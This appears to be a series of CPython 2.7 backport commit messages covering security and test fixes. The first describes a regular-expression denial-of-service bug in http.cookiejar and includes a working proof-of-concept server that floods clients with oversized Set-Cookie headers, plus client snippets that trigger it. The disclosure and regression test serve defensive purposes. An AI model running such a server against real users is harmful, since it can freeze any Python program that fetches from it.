The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).
LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.
The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups the regex could be simplified to
\d+-\w+-\d+(\s*\s*\s*)$
Therefore, a long sequence of spaces can trigger bad performance.
Matching a malicious string such as
LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")
caused catastrophic backtracking.
The fix removes ambiguity about which \s* should match a particular
space.
You can create a malicious server which responds with Set-Cookie headers
to attack all python programs which access it e.g.
from http.server import BaseHTTPRequestHandler, HTTPServer
def make_set_cookie_value(n_spaces):
spaces = " " * n_spaces
expiry = f"1-c-1{spaces}!"
return f"b;Expires={expiry}"
class Handler(BaseHTTPRequestHandler):
def do_GET(self):
self.log_request(204)
self.send_response_only(204) # Don't bother sending Server and Date
n_spaces = (
int(self.path[1:]) # Can GET e.g. /100 to test shorter sequences
if len(self.path) > 1 else
65506 # Max header line length 65536
)
value = make_set_cookie_value(n_spaces)
for i in range(99): # Not necessary, but we can have up to 100 header lines
self.send_header("Set-Cookie", value)
self.end_headers()
if __name__ == "__main__":
HTTPServer(("", 44020), Handler).serve_forever()
This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.
Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :
import http.cookiejar, urllib.request
cj = http.cookiejar.CookieJar()
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
r = opener.open("http://localhost:44020/")
The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):
import requests
requests.get("http://localhost:44020/")
* Regression test for http.cookiejar REDoS
If we regress, this test will take a very long time.
* Improve performance of http.cookiejar.ISO_DATE_RE
A string like
"444444" + (" " * 2000) + "A"
could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.
(cherry picked from commit 1b779bfb85)
Backporting this change, I observe a couple of things:
1. The _encode_request call is no longer meaningful because the request construction will implicitly encode the request using the default encoding when the format string is used (request = '%s %s %s'...). In order to keep the code as consistent as possible, I decided to include the call as a pass-through. I'd be just as happy to remove it entirely, but I'll leave that up to the reviewer to decide. It's okay that this functionality is disabled on Python 2 because this functionality was mainly around bpo-36274, which was mainly a concern with the transition to Python 3.
2. Because _encode_request is no longer meaningful, neither is the test for it, so I've removed that test. Therefore, the meaningful part of this test is that for bpo-38216, adding a (underscore-protected) hook to customize/disable validation.
(cherry picked from commit 7774d7831e)
Co-authored-by: Jason R. Coombs <jaraco@jaraco.com>
test.pythoninfo now logs environment variables used by OpenSSL and
Python ssl modules, and logs attributes of 3 SSL contexts
(SSLContext, default HTTPS context, stdlib context).
(cherry picked from commit 1df1c2f8df)
This change skips parsing of email addresses where domains include a "@" character, which can be maliciously used since the local part is returned as a complete address.
(cherry picked from commit 8cb65d1381)
Excludes changes to Lib/email/_header_value_parser.py, which did not
exist in 2.7.
Co-authored-by: jpic <jpic@users.noreply.github.com>
https://bugs.python.org/issue34155
If this service had thoroughly vanished, we could just ignore the
test until someone gets around to either recreating such a service
or redesigning the test to somehow work locally. The
`support.transient_internet` mechanism catches the failure to
resolve the domain name, and skips the test.
But in fact the domain snakebite.net does still exist, as do its
nameservers -- and they can be quite slow to reply. As a result
this test can easily take 20-30s before it gets auto-skipped.
So, skip the test explicitly up front.
(cherry picked from commit 5b95a1507e)
Co-authored-by: Greg Price <gnprice@gmail.com>
Fix test_wsgiref.testEnviron() to no longer depend on the environment
variables (don't fail if "X" variable is set).
testEnviron() now overrides os.environ to get a deterministic
environment. Test full TestHandler.environ content: not only a few
selected variables.
(cherry picked from commit 5150d32792)
Co-authored-by: Victor Stinner <vstinner@redhat.com>
* regrtest: Add --cleanup option to remove "test_python_*" directories
of previous failed test jobs.
* Add "make cleantest" to run "python -m test --cleanup".
(cherry picked from commit 47fbc4e45b)
test_gdb no longer fails if it gets an "unexpected" message on
stderr: it now ignores stderr. The purpose of test_gdb is to test
that python-gdb.py commands work as expected, not to test gdb.
(cherry picked from commit e56a123fd0)
If urlparse.urlsplit() detects an invalid netloc according to NFKC
normalization, the error message type is now str rather than unicode,
and use repr() to format the URL, to prevent <exception str() failed>
when display the error message.
* bpo-12639: msilib.Directory.start_component() fails if *keyfile* is not None (GH-13688)
msilib.Directory.start_component() was passing an extra argument to CAB.gen_id().
(cherry picked from commit c8d5bf6c3f)
Co-authored-by: Zackery Spytz <zspytz@gmail.com>
Disallow control chars in http URLs in urllib2.urlopen. This
addresses a potential security problem for applications that do not
sanity check their URLs where http request headers could be injected.
Disable https related urllib tests on a build without ssl (GH-13032)
These tests require an SSL enabled build. Skip these tests when
python is built without SSL to fix test failures.
Use httplib.InvalidURL instead of ValueError as the new error case's
exception. (GH-13044)
Backport Co-Authored-By: Miro Hrončok <miro@hroncok.cz>
(cherry picked from commit 7e200e0763)
Notes on backport to Python 2.7:
* test_urllib tests urllib.urlopen() which quotes the URL and so is
not vulerable to HTTP Header Injection.
* Add tests to test_urllib2 on urllib2.urlopen().
* Reject non-ASCII characters: range 0x80-0xff.
TLS 1.3 has a more efficient handshake protocol. The client can reject the server's credentials and close the connection before the server has even finished writing out all of its initial data. Depending on whether the server finishes writing the rest of its handshake before the it sees the connection is reset, the server will read an empty line or see a ECONNRESET OSError. Nothing is really wrong here with the server or client, so just suppress the error output in the OSError case to fix the test.
This fix isn't required in Python 3 because clients that reject the server's certificate will shut down the TLS layer before closing the TCP connection.
Modern Linux distros such as Debian Buster have default OpenSSL system
configurations that reject connections to servers with weak certificates
by default. This causes our test suite run with external networking
resources enabled to skip these tests when they encounter such a
failure.
Fixing the network servers is a separate issue.
(cherry picked from commit 2cc0223)
Changes to test_ssl.py required as 2.7 has legacy protocol tests.
The test_httplib.py change is omitted from this backport as
self-signed.pythontest.net's certificate was updated and the
test_nntplib.py change is not applicable on 2.7.
Authored-by: Gregory P. Smith greg@krypto.org
* [2.7] bpo-36816: Update the self-signed.pythontest.net cert (GH-13192)
We updated the server, our testsuite must match.
https://bugs.python.org/issue36816✈️ CLE -> DEN ✈️ #pycon2019 #beyonce
(cherry picked from commit 6bd81734de)
The 2.7 tree also needed a certificate in the capath directory updated.
The filename for that was determined by `openssl x509 -in $cert.pem -subject_hash`.
Authored-by: Gregory P. Smith <greg@krypto.org>
bpo-28552, bpo-7774: Fix distutils.sysconfig if sys.executable is
None or an empty string: use os.getcwd() to initialize project_base.
Fix also the distutils build command: don't use sys.executable if
it's evaluated as false (None or empty string).
Fix reference leak hunting in regrtest: compute also deltas (of
reference count and file descriptor count) during warmup, to ensure
that everything is initialized before starting to hunt reference
leaks.
Other changes:
* Replace gc.collect() with support.gc_collect() in clear_caches()
* dash_R() is now more quiet with --quiet option (don't display
progress).
* Precompute the full range for "for it in range(repcount):" to
ensure that the iteration doesn't allocate anything new.
* dash_R() now is responsible to call warm_caches().
(cherry picked from commit 5aaac94eeb)